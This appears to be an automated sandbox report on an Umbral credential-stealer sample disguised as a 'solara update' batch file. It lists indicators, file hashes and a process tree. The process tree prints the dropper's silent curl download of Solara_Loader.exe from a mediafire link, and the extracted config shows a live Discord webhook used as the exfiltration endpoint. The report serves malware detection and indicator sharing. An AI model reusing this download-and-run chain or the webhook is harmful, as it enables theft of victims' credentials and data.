umbral | 6b38b27adbd76a7615d4f847603272918892835aef5339db8536940aab31532b

Analysis

max time kernel
22s
max time network
10s
platform
windows11-21h2_x64
resource
win11-20250313-en
resource tags

arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
submitted
24/03/2025, 09:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

solara update.bat
Size

696B
MD5

e53d059e74af5964cd9fcc1990fe20ed
SHA1

b8b2f31a75e0b01e9b8a0b20865d1a620a67953d
SHA256

6b38b27adbd76a7615d4f847603272918892835aef5339db8536940aab31532b
SHA512

c327f797b0eabbc152b5f0431fad1b89c150e65a5f047ba9e3e01ac759aaeab1c9a759cab159d42429bae656eda6c8ef95d466c39d3f982ec0549f12f02aead3

Score

10^/10

umbral stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1353647650406273086/8GnnMeDUTZK-6-j9EDZvfKzIJyfKeVtDQ5So4SbcZVbnlHXY3xScnbsdQlsZvj11NCJ3

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001c00000002b08f-3.dat	family_umbral
behavioral1/memory/2776-9-0x0000018FCA810000-0x0000018FCA850000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Downloads MZ/PE file 1 IoCs

flow	pid	Process
2	4996	curl.exe

Executes dropped EXE 1 IoCs

pid	Process
2776	Solara_Loader.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
9	ip-api.com

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2020	timeout.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeDebugPrivilege	2776	Solara_Loader.exe
Token: SeIncreaseQuotaPrivilege	1940	wmic.exe
Token: SeSecurityPrivilege	1940	wmic.exe
Token: SeTakeOwnershipPrivilege	1940	wmic.exe
Token: SeLoadDriverPrivilege	1940	wmic.exe
Token: SeSystemProfilePrivilege	1940	wmic.exe
Token: SeSystemtimePrivilege	1940	wmic.exe
Token: SeProfSingleProcessPrivilege	1940	wmic.exe
Token: SeIncBasePriorityPrivilege	1940	wmic.exe
Token: SeCreatePagefilePrivilege	1940	wmic.exe
Token: SeBackupPrivilege	1940	wmic.exe
Token: SeRestorePrivilege	1940	wmic.exe
Token: SeShutdownPrivilege	1940	wmic.exe
Token: SeDebugPrivilege	1940	wmic.exe
Token: SeSystemEnvironmentPrivilege	1940	wmic.exe
Token: SeRemoteShutdownPrivilege	1940	wmic.exe
Token: SeUndockPrivilege	1940	wmic.exe
Token: SeManageVolumePrivilege	1940	wmic.exe
Token: 33	1940	wmic.exe
Token: 34	1940	wmic.exe
Token: 35	1940	wmic.exe
Token: 36	1940	wmic.exe
Token: SeIncreaseQuotaPrivilege	1940	wmic.exe
Token: SeSecurityPrivilege	1940	wmic.exe
Token: SeTakeOwnershipPrivilege	1940	wmic.exe
Token: SeLoadDriverPrivilege	1940	wmic.exe
Token: SeSystemProfilePrivilege	1940	wmic.exe
Token: SeSystemtimePrivilege	1940	wmic.exe
Token: SeProfSingleProcessPrivilege	1940	wmic.exe
Token: SeIncBasePriorityPrivilege	1940	wmic.exe
Token: SeCreatePagefilePrivilege	1940	wmic.exe
Token: SeBackupPrivilege	1940	wmic.exe
Token: SeRestorePrivilege	1940	wmic.exe
Token: SeShutdownPrivilege	1940	wmic.exe
Token: SeDebugPrivilege	1940	wmic.exe
Token: SeSystemEnvironmentPrivilege	1940	wmic.exe
Token: SeRemoteShutdownPrivilege	1940	wmic.exe
Token: SeUndockPrivilege	1940	wmic.exe
Token: SeManageVolumePrivilege	1940	wmic.exe
Token: 33	1940	wmic.exe
Token: 34	1940	wmic.exe
Token: 35	1940	wmic.exe
Token: 36	1940	wmic.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
416	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 3548 wrote to memory of 4996	3548	cmd.exe	82
PID 3548 wrote to memory of 4996	3548	cmd.exe	82
PID 3548 wrote to memory of 2776	3548	cmd.exe	84
PID 3548 wrote to memory of 2776	3548	cmd.exe	84
PID 3548 wrote to memory of 1944	3548	cmd.exe	85
PID 3548 wrote to memory of 1944	3548	cmd.exe	85
PID 2776 wrote to memory of 1940	2776	Solara_Loader.exe	86
PID 2776 wrote to memory of 1940	2776	Solara_Loader.exe	86
PID 3548 wrote to memory of 2020	3548	cmd.exe	89
PID 3548 wrote to memory of 2020	3548	cmd.exe	89

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\solara update.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3548
- C:\Windows\system32\curl.exe
  curl -L -O --silent https://download1322.mediafire.com/y1yhciihp9tgp6ExfuKj1yWFgLYLpc6Ekq0rSS2G1oyKnE-q6dLPLxGAl32tsnWVROsfWwHQt41VJu5PbUxWbplSeWVIoXOTZAzyU4RHK83CzArjFq1EsVlQRsqCPU_lbI0aXUQmSGumZnMks-Z7rqfG0cVJF7nOojAx7jjApQ/vcdv7nxo6mud43d/Solara_Loader.exe
  2⤵
  - Downloads MZ/PE file
  PID:4996
- C:\Users\Admin\AppData\Local\Temp\Solara_Loader.exe
  Solara_Loader.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2776
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1940
- C:\Windows\system32\cscript.exe
  cscript //nologo "C:\Users\Admin\AppData\Local\Temp\temp.vbs"
  2⤵
  PID:1944
- C:\Windows\system32\timeout.exe
  timeout 2
  2⤵
  - Delays execution with timeout.exe
  PID:2020

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:416

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
23KB

MD5
91e99867496bc76a97d2dec29559f49c

SHA1
3cc4fdfff67ca700137b71a0a26d332785d024b7

SHA256
73d7d024408b052c86da72cc0196f9928314a773877a0465dd91cc09d418f761

SHA512
9cd1eaae9cd87618c38ef17a2c23d36ea6eea45109b568d656b74d221c732f9ecdde2c13d230c3909d0b3bd702d0a69817a09a9b4d1de7ed6ffa6bb2807aaf0a

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
24KB

MD5
c07c43f5503a51c2271510d90ac0424a

SHA1
8067dd9f0e3d4b8a499c1c1237d606efdc164ef8

SHA256
83872132b5ba21dc268382f56eef78fd633125bc804a09abbd09e0d0efd13928

SHA512
c8006d0b4d8a381b90048a23fa2745665f6e5e8d062e3700ee7da7b44218f185e775eae87c19892d7d369073d471960a287a07f33af750fc2062ded05b31f198

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara_Loader.exe

Filesize
229KB

MD5
15f71910808d64bd2021efb24b30de91

SHA1
cb0d1dcfd2f525a103c915377b47dff19ef076c3

SHA256
2c499d4aaf34cc278853ca83fca87b9c1c0290d0c11eb1ec37bc89449310d237

SHA512
00f9b8a8c68045211ca4b282c2b16069996f0e4002f2f89a6a23f768078f8fa7e0c548c96493255bdc788b057ebff20dee14af35cb7703c9bd9a5234e2879188

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.vbs

Filesize
231B

MD5
a85386771dc2921639049f462c0ca288

SHA1
dd1e796d80e27c19d1d747b1da648df2057045c0

SHA256
ddb45644bab8c60205c7f0b3498202ef79871d3f551374d225326502fa638955

SHA512
5dcc7a27c8d7bd4896bc0522c8d4f1432980873b869d2b89aa2df88564d1a11f45eb6a179efa735d53c3d39d09a768beb1e8e74f0ebda1132ab87cf41ae911d1

Download Submit
memory/2776-8-0x00007FFFF2D03000-0x00007FFFF2D05000-memory.dmp

Filesize
8KB

Download
memory/2776-9-0x0000018FCA810000-0x0000018FCA850000-memory.dmp

Filesize
256KB

Download
memory/2776-11-0x00007FFFF2D00000-0x00007FFFF37C2000-memory.dmp

Filesize
10.8MB

Download
memory/2776-13-0x00007FFFF2D00000-0x00007FFFF37C2000-memory.dmp

Filesize
10.8MB

Download